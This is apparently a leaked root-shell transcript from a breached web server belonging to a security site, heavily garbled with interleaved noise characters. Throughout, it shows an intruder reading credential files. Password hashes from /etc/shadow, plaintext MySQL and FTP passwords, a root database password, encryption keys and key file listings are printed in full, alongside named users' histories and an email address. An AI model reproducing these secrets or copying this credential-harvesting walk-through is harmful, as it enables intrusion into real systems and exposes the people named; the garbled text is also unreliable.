jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::& j: ]8 S- j$ b
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::& T% W/ W7 N- D. F( c( `
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::" Q1 b M* H/ u) D8 W
) I: ]! ]8 |1 K7 S7 g6 Nsh-3.2# cat /etc/motd7 R# X) X o7 B6 S. d, O
#####################################################2 g4 \ a* b4 v; \9 e3 `) Z. e
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
; L" D$ Z% t1 `5 ^9 A: F# |__| [__ | |__| | |__| | | | [__ | |__| #" t& ]) f1 K1 Z: J% \/ i
# | | ___] | | | |___ | | \/ | ___] | | | #
W+ Z1 y# G+ z! p4 ?% @# #
" G! }4 J) ~" u" k* U#####################################################
. \* |+ l+ Z, C% k# #0 T, j t' O8 S1 k- G3 X3 L5 k4 D
# Admin Contact - 链接标记support@secureservertech.com #
5 F: ~1 T, y6 _1 T4 ?" q# #7 L5 E+ w* {/ m
# Available ShortCuts #
0 g% d7 G0 r) s3 ^8 G# #: y! I: V( z3 V/ Z" {" W
# nst - list active connections #
& a# }8 r* k! q) |" {# ddos - shows how many times each ip is connected #9 K; a" p N3 d, ]6 `
# ltr - restart the webserver #7 `/ C2 k% H6 j1 {" v4 t% O
# phpc - edit the php config file #
1 Z% Q9 [1 F* F0 J2 B Y. o" i1 \# htc - edit the webserver configuration file #5 O. s) |2 C; t' v) X( {
# up - uptime #
7 K5 ?( l6 ^8 {# etd - edit the motd of the day file #
3 v2 l0 u' I3 J, `, W# htr - start and restart apache if needed #2 ^! H( G! z/ {( F* K
# syng - shows active SYN_RECV connections #& N8 K1 L* f3 k& N
# synd - syn flood blocker - “synd -h” for usage #. c7 P0 m$ T4 H# w ?) B1 [
#####################################################/ i" `: W- i& r) T3 \
# NOTES: #
: R( O, A, `+ I5 M- @+ [# {8 q$ f# Last Upgrade - 12-08-2008 by JF #
/ c0 a& p1 g2 t% X- \# My.cnf/Mysql Optimization - 1-28-09 #* Z; b8 u& m0 l2 u. k r; E2 B
# #$ v, J ^2 s% v2 {4 G9 G0 B
# #
/ K% U( _9 f. c/ q: q# #
, R: x/ Q6 G/ [#####################################################
1 O+ l% t! f6 X: X: v8 t$ N8 @! N9 ^# j7 Y3 G% u6 l
sh-3.2# lastlog | grep -v Never
) v; D7 V8 ^/ g( f0 }5 dUsername Port From Latest) C9 v& S- r& T" n; ?
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009# v! M: F" ^( k2 b7 Z! Z7 J4 t
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008( b7 @4 U0 ^4 k- F6 U
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
9 L5 W, ]- q6 Zastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009) d# C3 v& A' w; z3 C2 c
- u8 r; b2 Y) l+ [4 H) Zsh-3.2# ls -la
6 r, k0 W, {, E* R& `total 453376( _! I$ R6 G( e' Z
drwxr-x— 15 root root 4096 Jun 4 08:40 ." H* U0 X1 R5 p) B: F$ b$ d
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( ~3 S0 s% v% a$ P# k-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip* i2 \4 x: v+ J
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg ~/ E6 s/ v7 a. q8 j) Q, m
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
4 i# Y: I: |% H' e" g-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
w) Q( H+ t; R9 P; i$ J, n4 R-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
& y- M2 @* u2 r9 a-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
; g+ K2 b1 ?$ e-rwx—— 1 root root 1899 Oct 28 2007 bk.sh, J; R0 ]% [/ @- z, z
-rw-r–r– 1 root root 1327 Nov 29 2007 cert- f3 n8 u4 D" }
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
+ Z5 G) [2 b. o) sdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
+ p5 ^2 X$ w# C& J8 O, d-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc7 S3 z* }/ \" I
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 c7 w$ `- ~5 y+ A3 f w* ldrwx—— 2 root root 4096 Oct 28 2007 .elinks$ r; {9 T/ G: O% G: r% p$ I
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.11 v) d! U5 \& E3 x' B# [" {- F
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
% h5 Z7 O, x5 _; I$ a6 o5 Q& g' O: ~-rw——- 1 root root 0 Apr 16 13:19 .history! n. g* B6 [ B( n
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log7 { J9 g3 u- d
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
( o6 _9 C9 T, Y! K- U-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh# J# s& M* r5 M9 ]8 v
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
; f% G% O, s$ _ |drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
( N) `$ x" x+ Y/ d ldrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- e5 Q3 R! I) O: R5 f-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz) Q. Z( n$ P+ ~
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2% g% c( K6 ~' a3 c W! ?
-rwx—— 1 root root 760 Sep 18 2008 lp/ X' k. N$ z+ i, W0 `' W; S
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
. ]7 D/ g) P4 Y5 n d; I-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
2 Z- u; {8 Q. s-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1: c4 C/ P r: J6 T
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9! T7 m ~9 w5 s9 W* B" d) _
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz2 K& a% r4 _$ k0 |& n+ H
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.37 S& | _* C% R2 T' S0 R! H1 e0 ~/ d
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
2 ^1 q4 A% f( C7 W-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
; X$ m0 y" \* |-rw——- 1 root root 41 Oct 19 2007 .my.cnf2 V- F% a) F( y" ^1 O
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history# g: L7 {2 I3 m! q+ J- ^
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport1 Z( g( U! L) n! O- [! A
-rw——- 1 root root 41 May 20 2008 .mytop# a( p/ [) d+ d0 T/ @' s5 G
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
2 o& `" `2 Y7 \: O: y1 X-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
; M- ], V9 q4 p b. c1 tdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
* o6 z3 ~& {) d1 o9 d7 Q8 n-rw——- 1 root root 1462 Sep 21 2007 opt.php% ]/ o, n* n- t5 g1 O
-rw-r–r– 1 root root 3371 Sep 22 2007 p! z' |1 p7 F' S/ ^9 c
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz26 h2 j; }) v6 W, Z+ n' c' ` F& R$ y
-rw——- 1 root root 1024 Feb 3 21:32 .rnd, J' ~. O( b' N
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) c: a7 \0 V/ ]! _-rw-r–r– 1 root root 887 Nov 28 2007 server.key
" |5 {% @! k. R9 |" V4 z8 ~drwx—— 2 root root 4096 Oct 10 2008 .ssh
, U( f% {9 k1 Q4 p j1 f! q1 M# }-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat" e6 K4 E- _7 q: S, j
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
+ v2 g1 k' i: M9 O2 N+ _4 |4 c-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
+ E8 T% b, }8 \( P) t, s1 Y-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
1 S7 F$ z5 F8 O) C- `& edrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
; d! K1 f2 E- [% _; d-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh. G6 U% L$ P: w3 u( w
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0% U$ C& |/ l% k* A
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
& G5 C) S0 S" o# A m8 n8 n p: J-rw——- 1 root root 12997 May 16 2008 .viminfo
8 l) c4 E( G; G3 c) t0 A
* Z& R* n; N K( Z# q4 @" }- a7 Nsh-3.2# cat .bash_history2 O' @6 n# Z: Q& g6 b
[snip]
8 d+ }( \, o3 @wget cp4sst.com/sstlinux.tar.gz% W+ H4 V4 s) @/ \6 o/ v
tar zxvf sstlinux.tar.gz
M$ r. L+ [# S0 acd linux-2.6.27.10& E4 L M: [; O1 u9 C9 n# w- H
sh install.sh/ r/ \9 @ V" h9 p' m4 Z- I; i
make bzImage ; make modules ; make modules_install ; make install
+ m: Z7 n: m5 rmake clean
! G" T5 {; B5 [! i0 rservice mysqld restart% o3 U9 I% r/ ^2 O' l4 j
[snip]
" a* Z. W* _) D4 k) e: {cd /usr/sbin/, q7 J _- ?. k& b F
chmod 4777 traceroute1 L5 [5 v1 a9 ~1 R9 K
chmod 4777 ping
8 I5 ^- ?6 F& E9 z& h1 utraceroute -I 链接标记[url]www.astalavista.ch[/url]( W S+ z$ y' X* c
[snip]
4 y# v( |' H' pvi /etc/csf/csf.conf1 y; s6 {! c' g8 C1 @' }
traceroute google.ch- Z2 x4 w& j9 p9 @- E9 s( g
service csf restart" U& g7 W+ f8 y
tracert google.ch
3 `9 u; U/ }& {9 i& f z3 |service csf restart+ Q% C' b7 k6 d0 A7 a
traceroute 链接标记[url]www.google.ch[/url]4 Y A6 n6 X/ G" _( w
tracert 链接标记[url]www.google.ch[/url]
& A$ v# k$ t: W- Straceroute 链接标记[url]www.google.ch[/url]
8 |' E2 a, l% r8 K# v& Slocate traceroute b X5 u- `1 s- J) r) J
chown 4755 /bin/traceroute" |" k+ ~8 D: j! D
chown 4777 /bin/traceroute9 I6 y* ?* ^* F8 o/ c
locate ping
7 I4 @" d3 p4 X( [! U( |chown 4755 /bin/ping- l$ i% ^1 n0 X5 h# V
chown 4777 /bin/ping5 I7 {7 w6 K& V6 ]' g4 _
cd /bin/8 ]! [) h0 M! x0 [ e
ls -ali | grep ping
1 O% |/ E7 {* n; ~chown root ping w; Y6 j; u e% I+ m5 R
chmod 4755 ping8 Y- N1 }6 C, F
ls -ali | grep traceroute9 j" D0 r* B; L! e$ o1 T& k) Y
chown root traceroute0 i9 x" R' U6 F$ }" b: v' t
chmod 4755 traceroute
! w& d/ J, M5 Y4 ~ls -ali | grep traceroute% Q! k- Q7 \8 U4 _. l
traceroute -I 链接标记[url]www.google.ch[/url]8 O" ], p6 \5 A" K) Z( x
traceroute 链接标记[url]www.google.ch[/url]
) w# C/ `+ M D/ s, o' D2 ~6 z( `whois pmsantos.ch9 C; T5 x. d5 b$ p
[snip]
/ d3 H' ?: @" ?8 z6 w5 dmysql -h com_contrexx2_live < /root/defaultp_ports.sql7 T* F( |: c6 l- h+ q0 H4 w/ v7 w
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
- s- k! I5 x$ o% }# Jmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
$ p& f# m, T# ?. i" I" P3 n. q `& }mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
8 l" Q7 [" l7 u: J; T* z* Q- Ctop/ o. f* T$ f( j: J
ping ssth.ch
7 o& c, ~0 s4 p, Gping asdlkfaljgasd???ljg???lasj.ch
* o1 [* ~' r' V6 K9 E3 \ping asdlkfaljgasdlasj.ch3 `4 [2 I g! ?
ping 链接标记[url]www.ssth.ch[/url]
0 k. \1 k8 x1 E5 n8 w( ~ping ssth.ch
7 F; R4 i i3 Inslookup 链接标记[url]www.google.ch[/url]
" U4 Y" h% B2 q6 F& }- unslookup 链接标记[url]www.ssth.ch[/url]
( F( w6 g; u2 i h6 iman nslookup
3 R2 R( `* B9 T, d/ N6 g. xping 链接标记[url]www.google.ch[/url]' w6 d, e! ]3 Z
nslookup 链接标记[url]www.google.ch[/url]' |2 e# _6 _2 V* Q! @
nslookup 链接标记[url]www.google.ch[/url]) L8 @6 I0 h$ C/ R! D
nslookup salfjasdlf.ch: }+ i5 p7 R- U# ] K1 t
[snip]: B$ _- l9 c# i B, G; M
openssl passwd -1 sadf% T% P6 `' ~1 e2 R/ C& |6 N
openssl passwd -1 5cZNHstdTy
/ |/ N+ b3 _8 u" Z( Pmysql8 Z- [8 x0 d7 z! U! P
mysql6 w: I% t( q( x/ }- {
locate proftp% [' @ Q/ u0 |8 O- x5 S/ U6 N6 B
vi /etc/proftpd.passwd; Y' F- S+ {5 z J
service proftpd restart8 w! G# \. j) s3 Y5 U- F
locate proftpd.conf. S2 O- B! W$ i- t- r; |1 H) N; i
vi /etc/proftpd.conf
/ z, o& [) u: e n* q& H; Q, O; uvi /etc/proftpd.passwd6 H, I! @) O) P [8 C$ i
service proftpd restart# T0 h5 x+ h; U% S
[snip]/ \2 ^7 H V6 L) N0 f
/bin/sh /home/com/backup_system/backup.sh
5 x3 ?; T- D: e0 X' r; d0 ^0 ]tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
: u( }, j$ P3 d- l) g6 J2 Y+ Omysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql/ } F3 G/ P1 z& S% k' V3 L! q& U
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
( k) r4 T F1 h e; xls -ali
4 @0 w" ]* b1 b* _0 n6 m4 k- Umysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql$ Z) b; ~0 L; T
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql. o3 F5 R5 v/ J: A
crontab -l* A- y5 L& `: `$ F
crontab -l
; Z9 R I$ G2 V& \& Dphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
/ c- l k+ V. L4 [/home/com/public_html/modifications/cronjobs/exploits.sh( e' _8 N4 {8 |' d+ n0 Z
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
/ }/ c. W1 D0 K8 g. @4 O) star zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz ]4 i Z* @. d* V. u; K
cd lsws-4.0.3
( a- g- W! g# u2 xsh install.sh( p% E, d2 f" s/ p( O1 ^1 _- ?! R
uptime& w# ~3 g f2 T
hdparm -tt /dev/sda. h- I% O: ?7 T
iostat
+ S4 f6 ]* v" hyum install iostat
5 Z/ Y( I: w$ P Eiostat7 U2 w" O0 }2 N. |! U
whereis iostat Q$ ]+ @$ F# R! n0 b' g
yjm clean all
! x: ~) n" b* X J; r9 h% @2 Yyum clean all ; yum -y update! J2 d* ?* [% s9 x) n7 ?; d* P% v
iostat% V; t6 q4 V; I+ d& C& Z
yum install systat. X8 e; G a' ?2 y
rpm -qa | grep iostat
/ Q. U% w2 i* P1 J) D4 ]1 crpm -qa | grep sysstat' `; U) ]9 P: E' l' v
rpm -qa | grep systat4 X4 h) I6 l2 ?* w
dmesg -c1 B+ q& d! E1 Z
sysctl -p2 J# V3 u- y3 w" g
uname -r' ~8 ?2 q, w! B2 U$ o, o$ ?! Y
cd /usr/src
! \8 s/ w- O/ F; b" o* g7 m4 K3 Iwget nix101.com/kernels/sstlinux.tar.gz' Y. r! B m1 E8 F' E
shutdown -r now5 d: b. M, ~7 n
nano -w /boot/grub/grub.conf
4 I! t0 }9 T& V H9 t' U1 G5 B3 W
sh-3.2# cat .my.cnf9 `3 E- r# U7 z1 \* h
[client]2 o) V: t* M. [
user=da_admin, l( k: a; Y D: d5 i" a
password=X9dctmRH" |4 @1 V+ U) C$ u1 H- F6 U* c
+ \2 c1 v6 w. I' J
sh-3.2# cat /home/com/backup_system/backup.sh/ m4 e Z/ I% l. `2 T
#!/bin/sh
3 H$ {- |! \; v8 Y4 }#####################################################################; V! g" i0 p$ n H
# #: j$ Q0 P& U; R3 L
# incremental backup for astalavista.com #
& X. ? Z) J- J7 N1 J; v6 N7 l# #
% D; [1 D* H/ f5 Q9 J# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> ## T* D/ w! F4 R/ R) i+ y/ v
# #1 O% r3 E2 S/ [" C S
#####################################################################
* d7 k! u8 O7 j[snip]
8 V* D/ f5 @+ o: R0 n; t( {+ o% APROG_DIR=”/home/com/backup_system”;$ E, `+ D- A3 ?5 f. R
BACKUP_DIR=”/home/com/backups”;2 J) F8 _% }' J) ~+ E; P
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
1 `/ Q% ]; F. H s" |$ k# ftp for synology backup server
9 P' n. k K' _$ zFTP_HOST=”212.254.194.163″;
9 }/ R; h0 D, M; aFTP_PORT=”21″;
- b7 \9 {/ c+ S6 v! kFTP_USER=”astalavista.com”;. ~3 M- P7 K) C0 V
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;, T8 n5 r, K1 l; B* v( m1 n# a
FTP_DIR=”/astalavista.com”;
' ?) s2 P2 Z- l4 ]# database5 J. W; ~# X) e8 n% @ J
DB_HOST=”localhost”;
% h s9 y, B P( u1 I+ q0 f* r. jDB_USER=”contrexxuser2″;
% N- D! l) P$ h$ Y$ {9 ?DB_PASS=”0fEYNZgXz1pKe”;0 y. H u4 ?- O% S7 m" n+ y
DB_DATABASE1=”com_contrexx2_live”;
3 r h q4 K( ^5 r1 RDB_DATABASE2=”com_contrexx2″;& h" {" g2 G" H, @3 [8 T
[snip]
; `6 f3 V& M4 T5 J2 z% Pftp -in $FTP_HOST $FTP_PORT <<EOF4 O* m9 z% i! \2 H: v
quote USER $FTP_USER
% w' D% c: ~" z! B- a/ Qquote PASS $FTP_PASS
( l. ?6 `9 T) ^9 @cd $FTP_DIR
8 I& p) Q* x) F6 Z }* o3 r+ bput $DB_FULLNAME-SQL_Dump.tar
, {$ ~: L% o0 L' j1 aput $BACKUP_FULLNAME-Public_HTML.tar- t. ]4 _2 a# r
close
' z& X; g6 F( o4 M2 F# |0 [7 L5 {5 Cbye2 m. m" P) L* l
EOF
: I: \+ W/ \7 U' |/ o& P) T. `6 z; U- ?- y3 n# V5 p' {$ c3 m$ f; s
sh-3.2# cd /home7 m4 T6 w; }2 Q$ d; n
sh-3.2# ls -la/ b; K9 a# b/ P; m& N3 g4 R
total 120/ r. y6 e) [; c, L8 }. n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
$ T2 K' f- ~! P6 {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ D3 b# D) W1 C3 Y9 ]drwx–x–x 9 admin admin 4096 Nov 28 2007 admin, e5 X/ e( a; y" l
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group* \ l5 Y. P' A& t# o, |6 q
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user* ]1 ~/ c. \8 E
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
4 Z0 |' E% E2 X; B! \1 adrwxr-xr-x 2 root root 4096 Jul 29 2008 backup1 b; Q* `! u5 @
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
3 W u/ f P% _% q5 R+ L- t* Q" Rdrwx–x–x 10 com com 4096 Apr 28 12:40 com
- [( O; D- @' i8 d7 P% Ydrwxr-xr-x 2 root root 4096 May 17 2007 ftp
5 o% h5 L+ H7 N+ r8 Z+ A8 |; fdrwx—— 3 jon jon 4096 Sep 21 2007 jon
6 {' C4 k% r' s2 ~drwx—— 2 root root 16384 Sep 11 2007 lost+found
2 _$ s4 C. u4 F$ @" t# _drwxr-xr-x 2 root root 4096 Sep 14 2007 my/ w8 j# c+ y( ?
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: a: ]' T6 T$ Q# I9 G( x" o2 e1 Sdrwx—— 2 jon jon 4096 Sep 15 2007 test. |# O# c% }& k! s) E9 X! L$ o! y* F# }
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
; \6 n4 |1 u) j8 Q) G5 h4 i! R, o" `* t+ I# u8 h
sh-3.2# cd admin
. P1 D) k" h& C& Z) j( ~sh-3.2# ls -la
4 x0 o% y+ p. A0 b( V7 Ftotal 1735896# d9 E) x1 g t# M+ b' d4 ~7 z
drwx–x–x 9 admin admin 4096 Nov 28 2007 .5 Q4 R5 Q; x* M$ I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ `7 `# H5 t! e% }6 z, I
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
0 V% m# m3 k+ A2 Ydrwx—— 2 admin admin 4096 Sep 28 2007 backups6 k8 Q1 w( `' B: P7 _/ T0 k9 m+ ~
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
; Z/ [' S0 N; |% {: S0 Q4 x5 \-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
5 i) U) r' G- n6 s6 l-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile0 L( i, E% H. r8 X
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
3 R/ h, e% n8 l! z, Edrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
2 t% P8 S, x- o0 l, `! `drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
5 A( y: o5 ]6 b, G2 G5 n8 P/ @drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
+ q/ z4 O& x$ |- q-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 l# {! {2 F) ?; a4 r
drwx—— 2 admin admin 4096 Sep 21 2007 mail
7 y# Y" D8 W' l* l( M# N2 w1 p/ {1 b# d-rw-r–r– 1 root root 716 Nov 28 2007 server.csr; Y3 ?# D$ x- O3 t
-rw-r–r– 1 root root 887 Nov 28 2007 server.key: z7 r" M) |; [' A
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
6 b% S, k: \8 f+ h-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz" Y4 T2 e' O" @' S8 s7 ^
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups& W1 y2 c" w8 M. M
* y( t- s. y' E/ E# ksh-3.2# ..! p, n% i6 g9 t8 F
sh-3.2# cd jon
. A( L& I/ v. V7 i; u& osh-3.2# ls -la9 p) M. f, f) ~
total 36
$ X# B& Y1 \( l( q! d% g$ Gdrwx—— 3 jon jon 4096 Sep 21 2007 .
8 R0 f4 V' U4 `$ ]$ c8 S# ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 X2 x! ^' K) W% F7 |& o0 s: i
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history S1 m- q: S. u @' k8 k' O* {+ h' m
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
# Y: P. L( T) O, Q( _8 h9 w-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
; p; U2 G' I# v% h-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc9 e( q p/ N5 r: O6 s7 p4 |0 x
-rw-r–r– 1 root root 24 Sep 21 2007 info.php6 u1 o: H u5 U- P; f# D
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html/ H* i/ f$ o; Y" ^) n4 E: X1 o
0 c0 ~ J1 ~8 y4 P( Lsh-3.2# cd ..
" D) P! Z% d0 ash-3.2# cd test
, r0 y1 }9 B6 E+ x7 `+ ~3 z" xsh-3.2# ls -la
/ c& e P& P5 F2 Y& p* ?: Z/ ttotal 48
2 g- u' z3 L9 ~/ Q0 F) b! z0 a& Jdrwx—— 2 jon jon 4096 Sep 15 2007 .
4 V( S7 b3 K8 tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* c: O& S! X p) ^. m-rw——- 1 jon jon 79 Sep 21 2007 .bash_history* i# e" V& @! c# e0 q! U
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout- O- z& F3 O8 V6 v3 S8 K
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile* P' P9 Z7 s- W0 X. J. h5 A
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
4 S) ?. h8 D) W c* osh-3.2# cat .bash_history
) n9 B3 r' E% Y5 z2 {5 u( j [" K/usr/bin/mysqladmin -u root password PoliuJhytg67& ?# [$ X1 v4 o! Q1 r
) s+ V/ Y& y1 ]0 S! Nsh-3.2# cd .., F0 L1 Y( |9 n9 f
sh-3.2# cd astanet
" O( @& U9 g7 ~sh-3.2# ls -la, `( ~$ N) j$ ]& g6 i( |
total 527 }4 u3 ^! M1 d# z7 \
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .6 a0 T A* a# j/ K, r2 W& E5 b$ P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
2 N- }- M7 p$ S2 `! Q! i! n& {* Xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( \" W Z7 F/ o* D-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) d! ?0 s- c+ }7 ?& Q
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
& U% H+ f ^# K+ p$ N3 s5 R-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile9 m% S# W/ r5 g2 u H# u. E2 F
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# t+ A! M! l' U
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ r, a8 g. K7 L8 {6 V8 l
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" o& N% @& O2 _) adrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
* c- t! l U" a. P& k-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history& I* T3 {& k7 L$ T8 c( _- E% Q
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
( t: O! }" l( z' M2 \; V$ G-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; P3 R8 k! z' n( M9 P
$ V, e6 ]# n" A0 L$ q( \8 T qsh-3.2# cd auth/1 L' @$ F- o* [7 A5 c! U( w
sh-3.2# ls -la1 q' W( d8 D- c. K
total 28+ g- d5 H i7 } A5 M
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 N. Y; g; t6 p
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..# E3 B8 S) f- ]9 @3 }$ G& z4 D- B
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
8 u1 g# P; L5 h! l) z6 _0 r-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
/ R+ E6 B3 X# L6 g-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd7 Q1 R- U& C0 t9 t6 s6 J
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting! h! R3 B+ o1 t- w/ [
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
, w' m! M w. y6 j3 |
$ A9 i! _- t: E% J; Csh-3.2# cat hackercontest.config.inc.php
4 i5 D( [1 W, z2 v$ P<?PHP
) t8 J1 n& M; w7 o6 v$ L. C- R// Variabeln f?r Verbindung zur Datenbank //
+ Q6 t! b7 E0 T$ M& ~ A$conxHost = ‘localhost’; // MySQL hostname. C" H w- a2 }5 a [
$conxUser = ‘hackercontest’; // MySQL user, G1 x7 ?* t4 @- B* W8 o
$conxPassword = ‘K6m@7dUc’; // MySQL password$ m# J9 U6 o2 K n, {( P
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
. [: k( _2 w) D& S, [?>
: `$ A- f, @3 u& P* Ksh-3.2# cat hosting.config.inc.php4 Z+ \0 {$ ?, z0 V4 k5 o
<?PHP# o' O: B2 D. ]
// Variabeln f?r Verbindung zur Datenbank //
: G( W0 H8 }7 b# h1 q# D5 z( u$conxHost = ‘localhost’; // MySQL hostname
, \6 H$ v8 k Q- I$conxUser = ‘hostinguser’; // MySQL user
, J c% c1 _: ^5 k$conxPassword = ‘cXvB3981′; // MySQL password
6 T4 h2 M P# X4 l$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# |3 M+ g$ V+ t0 M7 j& a% c
?>/ H6 ^! H; a- ~ x
, R% G, d/ d$ M S6 e. rsh-3.2# cd ..
: A s- w. g4 z h5 o" g Bsh-3.2# cd com( \7 R5 ]& e3 i
sh-3.2# ls -la, f5 m4 |$ J9 c$ u
total 141208" i5 s* g' v h, K" A5 i; t0 B% e
